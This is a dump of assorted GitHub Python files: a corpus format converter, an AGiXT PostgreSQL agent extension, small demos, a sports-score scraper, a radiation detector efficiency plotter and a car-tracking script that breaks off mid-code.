new_file.write(\"\\n\")\n new_file.write(\"\\n\")\n new_file.close()\n\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "amkahn/question-answering", "sub_path": "src/convert_AQUAINT2_to_AQUAINT_format.py", "file_name": "convert_AQUAINT2_to_AQUAINT_format.py", "file_ext": "py", "file_size_in_byte": 2351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "2810922203", "text": "import logging\n\ntry:\n import psycopg2\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"psycopg2\"])\n import psycopg2\n\nimport psycopg2.extras\nimport logging\nfrom Extensions import Extensions\n\n\nclass postgres_database(Extensions):\n def __init__(\n self,\n POSTGRES_DATABASE_NAME: str = \"\",\n POSTGRES_DATABASE_HOST: str = \"\",\n POSTGRES_DATABASE_PORT: int = 5432,\n POSTGRES_DATABASE_USERNAME: str = \"\",\n POSTGRES_DATABASE_PASSWORD: str = \"\",\n **kwargs,\n ):\n self.agent_name = kwargs[\"agent_name\"] if \"agent_name\" in 
kwargs else \"gpt4free\"\n self.ApiClient = kwargs[\"ApiClient\"] if \"ApiClient\" in kwargs else None\n self.POSTGRES_DATABASE_NAME = POSTGRES_DATABASE_NAME\n self.POSTGRES_DATABASE_HOST = POSTGRES_DATABASE_HOST\n self.POSTGRES_DATABASE_PORT = POSTGRES_DATABASE_PORT\n self.POSTGRES_DATABASE_USERNAME = POSTGRES_DATABASE_USERNAME\n self.POSTGRES_DATABASE_PASSWORD = POSTGRES_DATABASE_PASSWORD\n self.commands = {\n \"Custom SQL Query in Postgres Database\": self.execute_sql,\n \"Get Database Schema from Postgres Database\": self.get_schema,\n }\n\n def get_connection(self):\n try:\n connection = psycopg2.connect(\n database=self.POSTGRES_DATABASE_NAME,\n host=self.POSTGRES_DATABASE_HOST,\n port=self.POSTGRES_DATABASE_PORT,\n user=self.POSTGRES_DATABASE_USERNAME,\n password=self.POSTGRES_DATABASE_PASSWORD,\n )\n return connection\n except Exception as e:\n logging.error(f\"Error connecting to Postgres Database. Error: {str(e)}\")\n return None\n\n async def execute_sql(self, query: str):\n if \"```sql\" in query:\n query = query.split(\"```sql\")[1].split(\"```\")[0]\n query = query.replace(\"\\n\", \" \")\n query = query.strip()\n logging.info(f\"Executing SQL Query: {query}\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n try:\n cursor.execute(query)\n rows = cursor.fetchall()\n cursor.close()\n connection.close()\n rows_string = \"\"\n # If there is only 1 row and 1 column, return the value as a string\n if len(rows) == 1 and len(rows[0]) == 1:\n return str(rows[0][0])\n # If there is more than 1 column and at least 1 row, return it as a CSV format\n if len(rows) >= 1 and len(rows[0]) > 1:\n # If there is more than 1 column and at least 1 row, return it as a CSV format, build column heading, and make sure each row value is quoted\n column_headings = []\n for column in cursor.description:\n column_headings.append(column.name)\n rows_string += \",\".join(column_headings) + \"\\n\"\n for row in rows:\n row_string = []\n for value in row:\n row_string.append(f'\"{value}\"')\n rows_string += \",\".join(row_string) + \"\\n\"\n return rows_string\n # If there is only 1 column and more than 1 row, return it as a CSV format\n if len(rows) > 1 and len(rows[0]) == 1:\n for row in rows:\n rows_string += f'\"{row[0]}\"\\n'\n return rows_string\n return rows_string\n except Exception as e:\n logging.error(f\"Error executing SQL Query: {str(e)}\")\n # Reformat the query if it is invalid.\n new_query = self.ApiClient.prompt_agent(\n agent_name=self.agent_name,\n prompt_name=\"Validate PostgreSQL\",\n prompt_args={\n \"database_type\": \"PostgreSQL\",\n \"schema\": await self.get_schema(),\n \"query\": query,\n },\n )\n return await self.execute_sql(query=new_query)\n\n async def get_schema(self):\n logging.info(f\"Getting schema for database '{self.POSTGRES_DATABASE_NAME}'\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(\n f\"SELECT schema_name FROM information_schema.schemata WHERE schema_name NOT IN ('pg_catalog', 'information_schema');\"\n )\n schemas = cursor.fetchall()\n sql_export = []\n key_relations = []\n for schema in schemas:\n schema_name = schema[\"schema_name\"]\n cursor.execute(\n f\"\"\"\n SELECT kcu.table_name as foreign_table, rel_tco.table_name as primary_table,\n kcu.column_name as foreign_column, rel_kcu.column_name as primary_column\n FROM information_schema.table_constraints tco\n JOIN information_schema.key_column_usage kcu \n ON 
kcu.constraint_name = tco.constraint_name\n AND kcu.constraint_schema = tco.constraint_schema\n JOIN information_schema.referential_constraints rco ON tco.constraint_name = rco.constraint_name\n AND tco.constraint_schema = rco.constraint_schema\n JOIN information_schema.key_column_usage rel_kcu ON rco.unique_constraint_name = rel_kcu.constraint_name\n AND rco.unique_constraint_schema = rel_kcu.constraint_schema\n JOIN information_schema.table_constraints rel_tco ON rel_kcu.constraint_name = rel_tco.constraint_name\n AND rel_kcu.constraint_schema = rel_tco.constraint_schema\n WHERE tco.constraint_type = 'FOREIGN KEY' AND tco.table_schema = '{schema_name}' \n \"\"\"\n )\n relations = cursor.fetchall()\n if relations:\n for relation in relations:\n key_relations.append(\n f\"-- {relation['foreign_table']}.{relation['foreign_column']} can be joined with \"\n f\"{relation['primary_table']}.{relation['primary_column']}\"\n )\n\n cursor.execute(\n f\"\"\"\n SELECT table_name, column_name, data_type, column_default, is_nullable, ordinal_position \n FROM information_schema.columns \n WHERE table_schema = '{schema_name}';\n \"\"\"\n )\n rows = cursor.fetchall()\n\n table_columns = {}\n for row in rows:\n table_name = row[\"table_name\"]\n if table_name not in table_columns:\n table_columns[table_name] = []\n column_details = {\n \"column_name\": row[\"column_name\"],\n \"data_type\": row[\"data_type\"],\n \"column_default\": row[\"column_default\"],\n \"is_nullable\": row[\"is_nullable\"],\n }\n table_columns[table_name].append(column_details)\n\n for table_name, columns in table_columns.items():\n create_table_sql = f\"CREATE TABLE {schema_name}.{table_name} (\"\n for column in columns:\n column_sql = f\"{column['column_name']} {column['data_type']}\"\n if column[\"column_default\"]:\n column_sql += f\" DEFAULT {column['column_default']}\"\n if column[\"is_nullable\"] == \"NO\":\n column_sql += \" NOT NULL\"\n create_table_sql += f\"{column_sql}, \"\n create_table_sql = create_table_sql.rstrip(\", \") + \");\"\n sql_export.append(create_table_sql)\n connection.close()\n return \"\\n\\n\".join(sql_export + key_relations)\n", "repo_name": "Josh-XT/AGiXT", "sub_path": "agixt/extensions/postgres_database.py", "file_name": "postgres_database.py", "file_ext": "py", "file_size_in_byte": 8038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2174, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.check_call", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 9, "usage_type": "attribute"}, {"api_name": "Extensions.Extensions", "line_number": 17, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 104, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "3673933445", "text": "from typing import NamedTuple\n\nclass MyTuple(NamedTuple):\n id: int\n name: str\n\nt1 = MyTuple(1, \"A\")\nt2 = MyTuple(*(2, \"B\"))\nt3 = MyTuple(**{\n \"id\": 3,\n \"name\": \"C\"})\nt4 = MyTuple._make([4, \"D\"])\n\nprint(t1)\nprint(t2)\nprint(t3)\nprint(t4)", "repo_name": "robobe/robobe.github.io", "sub_path": 
"examples/python/ds/named_tuple/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "3930685816", "text": "import nltk\n\n#importing stop words library (or not library !)\n\nnltk.download('stopwords')\n\nfrom nltk.corpus import stopwords\n\nfrom nltk import word_tokenize\n\n#langues reconnues par python stopwords\n\nlanguage = ['turkish', 'tajik', 'swedish', 'spanish', 'slovene', 'russian', 'romanian', 'portuguese', 'norwegian', 'nepali', 'kazakh', 'italian', 'indonesian', 'hungarian', 'greek', 'german', 'french', 'finnish', 'english', 'dutch', 'danish', 'azerbaijani', 'arabic']\npotentiel = []\nreconnu = []\ndico = {}\ndef reclangue() :\n text = str(input('type here '))\n tokenizedtxt = word_tokenize(text)\n for lang in language : \n stpwrs = (stopwords.words(lang))\n for word in tokenizedtxt : \n if word in stpwrs : \n potentiel.append(lang)\n for lng in potentiel : \n if lng not in reconnu :\n reconnu.append(lng)\n \n for lng in reconnu : \n cal = potentiel.count(lng)\n dico[lng] = cal\n dict(sorted(dico.items(), key=lambda item: item[1]))\n \n return print(max(dico, key=dico.get)) \n\nreclangue()\n", "repo_name": "MohdSarar/Language-Recognition-NLTK", "sub_path": "lang_reco.py", "file_name": "lang_reco.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 19, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "1167423623", "text": "\"\"\"\nMy Camera Application\nouthor : Sa'ad\n\n\"\"\"\n\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget) :\n # My Camera Application\n\n def __init__(self) :\n super().__init__() \n\n # variables for app window\n self.window_width = 640\n self.window_height = 400\n\n # image variables\n self.img_width = 640\n self.img_height = 400\n\n # setup the window\n self.setWindowTitle(\"My Camera App\")\n self.setGeometry(100, 100, self.window_width, self.window_height)\n self.setFixedSize(self.window_width, self.window_height)\n\n self.camera_icon = QIcon(cap_icon_path)\n\n # setup timer\n self.timer = QTimer()\n self.timer.timeout.connect(self.update)\n\n self.ui()\n\n def ui(self) :\n # contains all UI things\n # layout\n grid = QGridLayout()\n self.setLayout(grid)\n\n # image label\n self.image_label = QLabel(self)\n self.image_label.setGeometry(0, 0, self.img_width, self.img_height)\n\n # capture btn\n self.capture_btn = QPushButton(self)\n self.capture_btn.setIcon(self.camera_icon)\n self.capture_btn.setStyleSheet(\"border-radius: 30; border : 2px solid black; border-width : 3px\")\n self.capture_btn.setFixedSize(50, 50)\n self.capture_btn.clicked.connect(self.save_image)\n\n if not self.timer.isActive() :\n self.cap = cv2.VideoCapture(0)\n self.timer.start(20)\n\n grid.addWidget(self.capture_btn, 0, 0)\n grid.addWidget(self.image_label, 0 , 1)\n \n self.show()\n\n def update(self) :\n # update frames\n _, self.frame = self.cap.read()\n 
frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB)\n height, width, channel = frame.shape\n step = channel * width\n\n q_frame = QImage(frame.data, width, height, step, QImage.Format_RGB888)\n self.image_label.setPixmap(QPixmap.fromImage(q_frame))\n\n def save_image(self) :\n # save image from camera\n print(\"saving image\")\n cv2.imwrite(\"my_img.jpg\", self.frame)\n\n def record(self) :\n # record video\n pass\n\n\ncap_icon_path = \"assets/icons/capture.png\"\n\n# run \napp = QApplication(sys.argv)\nwin = Window()\nsys.exit(app.exec_())\n", "repo_name": "Saad-001/learning-python-with-problem-solving", "sub_path": "week_3/module_10_lab_class_3/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtGui.QIcon", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "22213329995", "text": "import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport re\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport time\r\n\r\ndef findBlockHeight(soup):\r\n height = soup.find('div', attrs={'class': 'ReactVirtualized__Grid__innerScrollContainer'})\r\n try:\r\n b = re.split(': |;', str(height['style']))\r\n l = b[b.index(' max-height') + 1]\r\n except:\r\n return 0\r\n return round(float(l[:len(l)-2])+800)\r\n\r\ndef findMatchesArray(h,a):\r\n array=[]\r\n while (h <= a):\r\n driver.execute_script(f\"window.scrollTo(0, {h});\")\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n h += 800\r\n t = soup.find_all('a', attrs={'data-id': True})\r\n try:\r\n for i in t:\r\n tteams = i.find('div', attrs={\"class\": \"sc-hLBbgP eIlfTT\"})\r\n line = str()\r\n for elem in tteams:\r\n # print(elem.text.strip())\r\n line += elem.text.strip() + \":\"\r\n score = i.find_all('div',\r\n attrs={'class': \"sc-hLBbgP sc-eDvSVe fuUKnP bMwHQt sc-9199a964-2 kgwLqG score-box\"})\r\n if score != []:\r\n line += score[0].text[0] + '/' + score[1].text[0] + \":\"\r\n live = i.find('div', attrs={'color': 'sofaSingles.live'})\r\n if live != None:\r\n line += 'live'\r\n if line not in array:\r\n array.append(line)\r\n except:\r\n z = 0\r\n return array\r\n\r\n# Connect to Google Sheets\r\nscope = ['https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\"sofascore-parser.json\", scope)\r\nclient = gspread.authorize(credentials)\r\ngoogle_sh = 
client.create(\"Parser\")\r\ngoogle_sh.share('muradrmagomedov@gmail.com', perm_type='user', role='writer')\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://www.sofascore.com/\")\r\ndata = driver.page_source\r\nsoup = BeautifulSoup(data, \"html.parser\")\r\nallmatches=[]\r\n#=======Find-all-urls-of sports=========================================================\r\nurls=[]\r\nx=[]\r\np=soup.find('div',attrs={'class':'sc-hLBbgP dRtNhU sc-12472a74-0 ijBjmq'}).find_all('a')\r\nfor elem in p:\r\n uurl='https://www.sofascore.com'+elem['href']\r\n if uurl not in urls and uurl!='https://www.sofascore.com/motorsport':\r\n urls.append(uurl)\r\n#=======end============================================================================\r\n#========Iterating through urls =======================================================\r\nfor elem in urls:\r\n driver.get(elem)\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n#=======Find-matches-block-height=====================================================\r\n a = findBlockHeight(soup)\r\n h = 0\r\n#======================================================================================\r\n#========Iterating through page========================================================\r\n allmatches.append(findMatchesArray(h,a))\r\n\r\nfor i in range(len(allmatches)):\r\n for j in range(len(allmatches[i])):\r\n x.append(allmatches[i][j].split(':'))\r\n name=urls[i].split('/')[-1]\r\n if name=='':\r\n name='football'\r\n sheet=google_sh.add_worksheet(title=f'{name}',rows=1000,cols=4)\r\n df=pd.DataFrame(x)\r\n sheet.update(x)\r\n x = []\r\ngoogle_sh.del_worksheet(worksheet='Sheet1')\r\ndriver.close()\r\n", "repo_name": "aagadg/sofascore-parser", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.split", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 51, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 51, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "29702069407", "text": "import csv\r\nimport os\r\nimport math\r\nfrom datetime import datetime\r\nimport string\r\nimport numpy as np\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import linregress\r\n\r\n\r\n#creates a list of all the csv files in the directory excluding the template\r\ncsvfiles = [os.path.join(root, name) for root, dirs, files in os.walk(\"./\") for name in files if name.endswith((\".csv\")) and name[-12:] != \"template.csv\"]\r\n\r\n\r\n#creates a dictionary associating each file with a list of 
its data\r\ndata = {}\r\nfor file in csvfiles:\r\n data[file] = []\r\n with open(file, 'rb') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n data[file].append(row[0])\r\n for i in range(1,7):\r\n data[file][i] = int(data[file][i])\r\n for i in range(7,16):\r\n data[file][i] = float(filter(lambda x: x in string.printable, data[file][i]))\r\n\r\n\r\n#combines the data into a dictionary keyed with names representing a chart\r\n# with a value as a list of lists of the data for a particular graph\r\ncharts = {}\r\nfor item in data:\r\n if data[item][16] not in charts:\r\n charts[data[item][16]] = [data[item]]\r\n else:\r\n charts[data[item][16]].append(data[item])\r\n\r\n\r\n# processes the data and calculations outputting tuples (pairs) of results to plot\r\ndatatoplot = {}\r\nfor date in charts:\r\n datatoplot[date] = []\r\n #memoize some of the processing\r\n processed = {}\r\n def findexpectation(setofdata,processed):\r\n activity = setofdata[7] * math.e ** (-math.log(2) * time / setofdata[8])\r\n s = setofdata[11]\r\n r = setofdata[12]\r\n solidangle = s ** 2 / (4 * math.pi * r ** 2)\r\n expec = 37000 * activity * setofdata[10] * setofdata[13] * solidangle\r\n processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])] = expec\r\n return expec\r\n\r\n for setofdata in charts[date]:\r\n end = datetime(setofdata[4], setofdata[5], setofdata[6])\r\n start = datetime(setofdata[1], setofdata[2], setofdata[3])\r\n difference = end - start\r\n time = (difference.days + difference.seconds / 86400) / 365.2425\r\n energy = setofdata[9]\r\n #check memoized data\r\n if (time, setofdata[10], setofdata[13], setofdata[11], setofdata[12]) in processed:\r\n expectation = processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])]\r\n #in case not already calculated, then calculate\r\n else:\r\n expectation = findexpectation(setofdata, processed)\r\n experimental = setofdata[14]\r\n efficiency = experimental / expectation\r\n datatoplot[date].append((energy, efficiency))\r\n\r\n\r\n\r\n#outputs data and graphs onto a pdf\r\nwith PdfPages('data.pdf') as pdf:\r\n plotting = sorted(datatoplot)\r\n\r\n for i in range(len(datatoplot)):\r\n x = []\r\n y = []\r\n for tup in datatoplot[plotting[i]]:\r\n x.append(tup[0])\r\n y.append(tup[1])\r\n\r\n # make the scatter plot\r\n plt.scatter(x, y, s=10, alpha=.5, marker='o')\r\n # determine best fit line\r\n par = np.polyfit(x, y, 1, full=True)\r\n slope=par[0][0]\r\n intercept=par[0][1]\r\n xl = [min(x), max(x)]\r\n yl = [slope*xx + intercept for xx in xl]\r\n plt.plot(xl, yl, '-r')\r\n\r\n #analyze data\r\n slope, intercept, rcorrelation, pcorrelation, stderr = linregress(x, y)\r\n #output y=mx+b and r^2 onto graph pdf\r\n plt.text(0, .95, \"y = \" + str(slope) + \"x + \" + str(intercept) + \", r squared = \" + str(rcorrelation))\r\n\r\n #output data points as text (ordered pairs) onto graph\r\n texts = {}\r\n for j in range(len(datatoplot[plotting[i]])):\r\n plt.text(0, .85 - j*.1 , datatoplot[plotting[i]][j])\r\n\r\n #label axes\r\n plt.xlabel('energy')\r\n plt.ylabel('efficiency')\r\n \r\n #set limits of x and y axes\r\n plt.ylim([0, 1])\r\n plt.xlim([0, 1400])\r\n\r\n #plot title\r\n plt.title(str(plotting[i]))\r\n\r\n pdf.savefig() # saves the current figure into a pdf page\r\n plt.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "meiaalsup/urop-detector-efficiency", "sub_path": "ProcessEnergies.py", "file_name": "ProcessEnergies.py", "file_ext": "py", 
"file_size_in_byte": 4218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.e", "line_number": 47, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 47, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "18541708704", "text": "from datetime import datetime\nfrom dateutil import tz\nfrom shared.settings import TIMEZONE\n\ndef timezone_recovery(dt:datetime,timezone:str='') -> datetime:\n '''\n MongoDBから取得したISODate型はタイムゾーンが抜け落ちている。\n それの補正とタイムゾーンの付与を行ったdatetime型を返す。\n MongoDBから取得したISODate型の項目を使う場合、基本的に当関数を通じて使用すること。\n '''\n if timezone == '':\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n dt = dt.astimezone(TIMEZONE)\n else:\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n _ = tz.gettz(timezone)\n dt = dt.astimezone(_)\n return dt", "repo_name": "pubranko/BrownieAtelier", "sub_path": "app/shared/timezone_recovery.py", "file_name": "timezone_recovery.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", 
"api": [{"api_name": "datetime.datetime", "line_number": 5, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 12, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 12, "usage_type": "name"}, {"api_name": "shared.settings.TIMEZONE", "line_number": 14, "usage_type": "argument"}, {"api_name": "dateutil.tz.gettz", "line_number": 16, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 16, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 18, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "21066190205", "text": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\n\r\ndef foofunction(x, y):\r\n a = []\r\n b = []\r\n c = []\r\n for i in range(0, len(x)):\r\n state = False\r\n for j in range(0, len(y)):\r\n if np.all(x[i] == y[j]):\r\n b.append(x[i])\r\n state = True\r\n if not state:\r\n a.append(x[i])\r\n\r\n for i in range(0, len(y)):\r\n state = False\r\n for j in range(0, len(x)):\r\n if np.all(x[j] == y[i]):\r\n state = True\r\n break\r\n if not state:\r\n c.append(y[i])\r\n return a, b, c\r\n\r\n\r\ndef labelformat(a):\r\n a = str(a)\r\n for i in range(len(a), 4):\r\n a = \"0\"+a\r\n return a\r\n\r\n\r\ncar_cascade = cv2.CascadeClassifier('haar_car.xml')\r\ninit = False\r\ncar_dataset = []\r\nframe_counter = 1\r\n\r\nfor i in range(1, 1701):\r\n img = cv2.imread(\"highway\\\\input\\\\in00\"+labelformat(i)+\".jpg\")\r\n car_dataset.append(img)\r\n\r\nall_cars = []\r\nid_vehicle = 1\r\n\r\nfor img in car_dataset:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n cars = car_cascade.detectMultiScale(gray, 1.1, 5)\r\n new_cars = []\r\n # read new detected objects\r\n for (x, y, w, h) in cars:\r\n new_cars.append(detected_object(x, y, w, h, \"Vehicle TBD\"))\r\n\r\n for element in range(len(all_cars)):\r\n all_cars[element].draw = False\r\n\r\n if not init and len(cars) > 0:\r\n for element in new_cars:\r\n element.label = str(id_vehicle)\r\n id_vehicle += 1\r\n all_cars = new_cars.copy()\r\n init = True\r\n\r\n elif init:\r\n # delete elements with no TTL left and decrements TTL\r\n for element in range(len(all_cars)):\r\n # todel = []\r\n if all_cars[element].TTL <= 0:\r\n all_cars[element].draw = False\r\n else:\r\n all_cars[element].TTL -= 1\r\n all_cars[element].draw = False\r\n # Determin object correspendence\r\n # compute xxo as [a,b] where a is the index of the new object in new_cars and o is the index of the object in all_cars\r\n if init and len(new_cars) > 0:\r\n xxo = []\r\n for new_element in range(len(new_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for old_element in range(len(all_cars)):\r\n distance.append(new_cars[new_element].distance(\r\n all_cars[old_element]))\r\n distance_indexes.append([new_element, old_element])\r\n xxo.append(distance_indexes[np.argmin(distance)])\r\n # Same thing as precedent , but this time we inverse the loop\r\n oxo = []\r\n for old_element in range(len(all_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for new_element in range(len(new_cars)):\r\n distance.append(all_cars[old_element].distance(\r\n new_cars[new_element]))\r\n distance_indexes.append([new_element, old_element])\r\n oxo.append(distance_indexes[np.argmin(distance)])\r\n # now we search for the intersection of xxo and oxo :\r\n # 1- if an element is common , the we update it's position in all_cars\r\n # 2 - if an element belongs only to xxo , then it's a new element\r\n # 3 - if an element belongs onlt to oxo , then we don't render 
